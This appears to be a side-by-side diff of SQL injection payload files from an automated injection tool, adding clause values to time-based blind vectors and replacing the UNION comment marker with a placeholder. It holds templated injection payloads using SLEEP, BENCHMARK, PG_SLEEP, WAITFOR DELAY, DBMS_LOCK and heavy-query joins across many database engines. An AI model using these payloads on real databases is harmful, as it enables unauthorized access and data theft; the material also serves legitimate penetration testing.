<vector>AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector> <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
<request> <request>
@@ -1159,7 +1159,7 @@
<stype>5</stype> <stype>5</stype>
<level>5</level> <level>5</level>
<risk>3</risk> <risk>3</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector> <vector>OR [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
<request> <request>
@@ -1179,7 +1179,7 @@
<stype>5</stype> <stype>5</stype>
<level>4</level> <level>4</level>
<risk>2</risk> <risk>2</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector> <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
<request> <request>
@@ -1199,7 +1199,7 @@
<stype>5</stype> <stype>5</stype>
<level>4</level> <level>4</level>
<risk>3</risk> <risk>3</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector> <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
<request> <request>
@@ -1219,7 +1219,7 @@
<stype>5</stype> <stype>5</stype>
<level>5</level> <level>5</level>
<risk>2</risk> <risk>2</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector> <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
<request> <request>
@@ -1240,7 +1240,7 @@
<stype>5</stype> <stype>5</stype>
<level>5</level> <level>5</level>
<risk>3</risk> <risk>3</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector> <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]000000000),NULL) ELSE '[RANDSTR]' END</vector>
<request> <request>
@@ -1261,7 +1261,7 @@
<stype>5</stype> <stype>5</stype>
<level>4</level> <level>4</level>
<risk>2</risk> <risk>2</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector> <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
<request> <request>
@@ -1281,7 +1281,7 @@
<stype>5</stype> <stype>5</stype>
<level>4</level> <level>4</level>
<risk>3</risk> <risk>3</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector> <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
<request> <request>
@@ -1301,7 +1301,7 @@
<stype>5</stype> <stype>5</stype>
<level>5</level> <level>5</level>
<risk>2</risk> <risk>2</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector> <vector>AND '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
<request> <request>
@@ -1322,7 +1322,7 @@
<stype>5</stype> <stype>5</stype>
<level>5</level> <level>5</level>
<risk>3</risk> <risk>3</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector> <vector>OR '[RANDSTR]'=CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END</vector>
<request> <request>
@@ -1390,7 +1390,7 @@
<stype>5</stype> <stype>5</stype>
<level>2</level> <level>2</level>
<risk>1</risk> <risk>1</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>3</where> <where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector> <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN SLEEP([SLEEPTIME]) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))</vector>
<request> <request>
@@ -1410,7 +1410,7 @@
<stype>5</stype> <stype>5</stype>
<level>3</level> <level>3</level>
<risk>1</risk> <risk>1</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>3</where> <where>3</where>
<vector>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector> <vector>(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request> <request>
@@ -1430,7 +1430,7 @@
<stype>5</stype> <stype>5</stype>
<level>4</level> <level>4</level>
<risk>2</risk> <risk>2</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>3</where> <where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector> <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))) ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))</vector>
<request> <request>
@@ -1450,7 +1450,7 @@
<stype>5</stype> <stype>5</stype>
<level>4</level> <level>4</level>
<risk>1</risk> <risk>1</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>3</where> <where>3</where>
<vector>([INFERENCE] AND SLEEP([SLEEPTIME]))</vector> <vector>([INFERENCE] AND SLEEP([SLEEPTIME]))</vector>
<request> <request>
@@ -1469,7 +1469,7 @@
<stype>5</stype> <stype>5</stype>
<level>5</level> <level>5</level>
<risk>1</risk> <risk>1</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>3</where> <where>3</where>
<vector>ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector> <vector>ELT([INFERENCE],SLEEP([SLEEPTIME]))</vector>
<request> <request>
@@ -1488,7 +1488,7 @@
<stype>5</stype> <stype>5</stype>
<level>5</level> <level>5</level>
<risk>1</risk> <risk>1</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>3</where> <where>3</where>
<vector>MAKE_SET([INFERENCE],SLEEP([SLEEPTIME]))</vector> <vector>MAKE_SET([INFERENCE],SLEEP([SLEEPTIME]))</vector>
<request> <request>
@@ -1507,7 +1507,7 @@
<stype>5</stype> <stype>5</stype>
<level>3</level> <level>3</level>
<risk>1</risk> <risk>1</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>3</where> <where>3</where>
<vector>(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector> <vector>(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request> <request>
@@ -1527,7 +1527,7 @@
<stype>5</stype> <stype>5</stype>
<level>4</level> <level>4</level>
<risk>2</risk> <risk>2</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>3</where> <where>3</where>
<vector>(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector> <vector>(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
<request> <request>
@@ -1546,7 +1546,7 @@
<stype>5</stype> <stype>5</stype>
<level>3</level> <level>3</level>
<risk>1</risk> <risk>1</risk>
<clause>1,3</clause> <clause>1,3,9</clause>
<where>3</where> <where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector> <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN WAITFOR DELAY '0:0:[SLEEPTIME]' ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))</vector>
<request> <request>
@@ -1567,7 +1567,7 @@
<stype>5</stype> <stype>5</stype>
<level>4</level> <level>4</level>
<risk>2</risk> <risk>2</risk>
<clause>1,3</clause> <clause>1,3,9</clause>
<where>3</where> <where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END))</vector> <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END))</vector>
<request> <request>
@@ -1589,7 +1589,7 @@
<stype>5</stype> <stype>5</stype>
<level>3</level> <level>3</level>
<risk>1</risk> <risk>1</risk>
<clause>1,3</clause> <clause>1,3,9</clause>
<where>3</where> <where>3</where>
<vector>BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</vector> <vector>BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END;</vector>
<request> <request>
@@ -1608,7 +1608,7 @@
<stype>5</stype> <stype>5</stype>
<level>3</level> <level>3</level>
<risk>1</risk> <risk>1</risk>
<clause>1,3</clause> <clause>1,3,9</clause>
<where>3</where> <where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)</vector> <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END) FROM DUAL)</vector>
<request> <request>
@@ -1627,7 +1627,7 @@
<stype>5</stype> <stype>5</stype>
<level>4</level> <level>4</level>
<risk>2</risk> <risk>2</risk>
<clause>1,3</clause> <clause>1,3,9</clause>
<where>3</where> <where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)</vector> <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END) FROM DUAL)</vector>
<request> <request>
@@ -1646,7 +1646,7 @@
<stype>5</stype> <stype>5</stype>
<level>4</level> <level>4</level>
<risk>2</risk> <risk>2</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>3</where> <where>3</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END))</vector> <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END))</vector>
<request> <request>
@@ -1666,7 +1666,7 @@
<stype>5</stype> <stype>5</stype>
<level>5</level> <level>5</level>
<risk>2</risk> <risk>2</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>3</where> <where>3</where>
<vector>IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector> <vector>IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
<request> <request>
@@ -1686,7 +1686,7 @@
<stype>5</stype> <stype>5</stype>
<level>5</level> <level>5</level>
<risk>2</risk> <risk>2</risk>
<clause>1,3</clause> <clause>1,3,9</clause>
<where>3</where> <where>3</where>
<vector>(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector> <vector>(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
<request> <request>
@@ -1705,7 +1705,7 @@
<stype>5</stype> <stype>5</stype>
<level>5</level> <level>5</level>
<risk>2</risk> <risk>2</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>3</where> <where>3</where>
<vector>(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector> <vector>(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
<request> <request>
@@ -1725,7 +1725,7 @@
<stype>5</stype> <stype>5</stype>
<level>4</level> <level>4</level>
<risk>2</risk> <risk>2</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector> <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM INFORMATION_SCHEMA.SYSTEM_USERS)</vector>
<request> <request>
@@ -1745,7 +1745,7 @@
<stype>5</stype> <stype>5</stype>
<level>5</level> <level>5</level>
<risk>2</risk> <risk>2</risk>
<clause>1,2,3</clause> <clause>1,2,3,9</clause>
<where>1</where> <where>1</where>
<vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</vector> <vector>(SELECT (CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) ELSE '[RANDSTR]' END) FROM (VALUES(0)))</vector>
<request> <request>

36
xml/payloads/06_union_query.xml
View File

@@ -12,7 +12,7 @@
<vector>[UNION]</vector> <vector>[UNION]</vector>
<request> <request>
<payload/> <payload/>
<comment>-- -</comment> <comment>[GENERIC_SQL_COMMENT]</comment>
<char>[CHAR]</char> <char>[CHAR]</char>
<columns>[COLSTART]-[COLSTOP]</columns> <columns>[COLSTART]-[COLSTOP]</columns>
</request> </request>
@@ -31,7 +31,7 @@
<vector>[UNION]</vector> <vector>[UNION]</vector>
<request> <request>
<payload/> <payload/>
<comment>-- -</comment> <comment>[GENERIC_SQL_COMMENT]</comment>
<char>NULL</char> <char>NULL</char>
<columns>[COLSTART]-[COLSTOP]</columns> <columns>[COLSTART]-[COLSTOP]</columns>
</request> </request>
@@ -50,7 +50,7 @@
<vector>[UNION]</vector> <vector>[UNION]</vector>
<request> <request>
<payload/> <payload/>
<comment>-- -</comment> <comment>[GENERIC_SQL_COMMENT]</comment>
<char>[RANDNUM]</char> <char>[RANDNUM]</char>
<columns>[COLSTART]-[COLSTOP]</columns> <columns>[COLSTART]-[COLSTOP]</columns>
</request> </request>
@@ -69,7 +69,7 @@
<vector>[UNION]</vector> <vector>[UNION]</vector>
<request> <request>
<payload/> <payload/>
<comment>-- -</comment> <comment>[GENERIC_SQL_COMMENT]</comment>
<char>[CHAR]</char> <char>[CHAR]</char>
<columns>1-10</columns> <columns>1-10</columns>
</request> </request>
@@ -88,7 +88,7 @@
<vector>[UNION]</vector> <vector>[UNION]</vector>
<request> <request>
<payload/> <payload/>
<comment>-- -</comment> <comment>[GENERIC_SQL_COMMENT]</comment>
<char>NULL</char> <char>NULL</char>
<columns>1-10</columns> <columns>1-10</columns>
</request> </request>
@@ -107,7 +107,7 @@
<vector>[UNION]</vector> <vector>[UNION]</vector>
<request> <request>
<payload/> <payload/>
<comment>-- -</comment> <comment>[GENERIC_SQL_COMMENT]</comment>
<char>[RANDNUM]</char> <char>[RANDNUM]</char>
<columns>1-10</columns> <columns>1-10</columns>
</request> </request>
@@ -126,7 +126,7 @@
<vector>[UNION]</vector> <vector>[UNION]</vector>
<request> <request>
<payload/> <payload/>
<comment>-- -</comment> <comment>[GENERIC_SQL_COMMENT]</comment>
<char>[CHAR]</char> <char>[CHAR]</char>
<columns>11-20</columns> <columns>11-20</columns>
</request> </request>
@@ -145,7 +145,7 @@
<vector>[UNION]</vector> <vector>[UNION]</vector>
<request> <request>
<payload/> <payload/>
<comment>-- -</comment> <comment>[GENERIC_SQL_COMMENT]</comment>
<char>NULL</char> <char>NULL</char>
<columns>11-20</columns> <columns>11-20</columns>
</request> </request>
@@ -164,7 +164,7 @@
<vector>[UNION]</vector> <vector>[UNION]</vector>
<request> <request>
<payload/> <payload/>
<comment>-- -</comment> <comment>[GENERIC_SQL_COMMENT]</comment>
<char>[RANDNUM]</char> <char>[RANDNUM]</char>
<columns>11-20</columns> <columns>11-20</columns>
</request> </request>
@@ -183,7 +183,7 @@
<vector>[UNION]</vector> <vector>[UNION]</vector>
<request> <request>
<payload/> <payload/>
<comment>-- -</comment> <comment>[GENERIC_SQL_COMMENT]</comment>
<char>[CHAR]</char> <char>[CHAR]</char>
<columns>21-30</columns> <columns>21-30</columns>
</request> </request>
@@ -202,7 +202,7 @@
<vector>[UNION]</vector> <vector>[UNION]</vector>
<request> <request>
<payload/> <payload/>
<comment>-- -</comment> <comment>[GENERIC_SQL_COMMENT]</comment>
<char>NULL</char> <char>NULL</char>
<columns>21-30</columns> <columns>21-30</columns>
</request> </request>
@@ -221,7 +221,7 @@
<vector>[UNION]</vector> <vector>[UNION]</vector>
<request> <request>
<payload/> <payload/>
<comment>-- -</comment> <comment>[GENERIC_SQL_COMMENT]</comment>
<char>[RANDNUM]</char> <char>[RANDNUM]</char>
<columns>21-30</columns> <columns>21-30</columns>
</request> </request>
@@ -240,7 +240,7 @@
<vector>[UNION]</vector> <vector>[UNION]</vector>
<request> <request>
<payload/> <payload/>
<comment>-- -</comment> <comment>[GENERIC_SQL_COMMENT]</comment>
<char>[CHAR]</char> <char>[CHAR]</char>
<columns>31-40</columns> <columns>31-40</columns>
</request> </request>
@@ -259,7 +259,7 @@
<vector>[UNION]</vector> <vector>[UNION]</vector>
<request> <request>
<payload/> <payload/>
<comment>-- -</comment> <comment>[GENERIC_SQL_COMMENT]</comment>
<char>NULL</char> <char>NULL</char>
<columns>31-40</columns> <columns>31-40</columns>
</request> </request>
@@ -278,7 +278,7 @@
<vector>[UNION]</vector> <vector>[UNION]</vector>
<request> <request>
<payload/> <payload/>
<comment>-- -</comment> <comment>[GENERIC_SQL_COMMENT]</comment>
<char>[RANDNUM]</char> <char>[RANDNUM]</char>
<columns>31-40</columns> <columns>31-40</columns>
</request> </request>
@@ -297,7 +297,7 @@
<vector>[UNION]</vector> <vector>[UNION]</vector>
<request> <request>
<payload/> <payload/>
<comment>-- -</comment> <comment>[GENERIC_SQL_COMMENT]</comment>
<char>[CHAR]</char> <char>[CHAR]</char>
<columns>41-50</columns> <columns>41-50</columns>
</request> </request>
@@ -315,7 +315,7 @@
<vector>[UNION]</vector> <vector>[UNION]</vector>
<request> <request>
<payload/> <payload/>
<comment>-- -</comment> <comment>[GENERIC_SQL_COMMENT]</comment>
<char>NULL</char> <char>NULL</char>
<columns>41-50</columns> <columns>41-50</columns>
</request> </request>
@@ -334,7 +334,7 @@
<vector>[UNION]</vector> <vector>[UNION]</vector>
<request> <request>
<payload/> <payload/>
<comment>-- -</comment> <comment>[GENERIC_SQL_COMMENT]</comment>
<char>[RANDNUM]</char> <char>[RANDNUM]</char>
<columns>41-50</columns> <columns>41-50</columns>
</request> </request>